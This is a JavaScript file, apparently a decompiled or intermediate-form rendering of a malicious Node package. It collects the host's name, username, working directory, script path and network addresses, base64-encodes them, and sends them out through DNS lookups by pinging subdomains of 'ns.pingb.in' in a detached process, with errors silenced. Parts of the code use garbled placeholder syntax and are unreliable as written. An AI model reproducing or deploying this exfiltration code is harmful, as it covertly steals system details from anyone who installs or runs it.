const os = require("os")
_tmp_5 = require("child_process")
var isWin = process.platform === "win32"
const id = "882a286c56adf0afbf0577e3da5e"
exfil({ d_hostname: os.hostname() })
exfil({ d_user: os.userInfo().username })
_tmp_8.d_cwd = <operator>.formatString("cwd: ", process.cwd(), "")
_tmp_9.d_dirname = <operator>.formatString("dirname: ", __dirname, "")
const nets = os.networkInterfaces()
_iterator_0 = <operator>.iterator(Object.keys(nets))
_iterator_1 = <operator>.iterator(nets[name])
_tmp_10._computed_object_property_0 = net.address
function exfil = function exfil(data) {
  try {
    const b64 = Buffer.from(JSON.stringify(data))
      .toString("base64")
      .replace(/=/gm, "");

    let args;
    if (isWin) {
      args = ["-n", "1"];
    } else {
      args = ["-c", "1"];
    }
    args.push(`${id}.${b64}.ns.pingb.in`);
    spawn(`ping`, args, { detached: true });
  } catch (e) {}
}
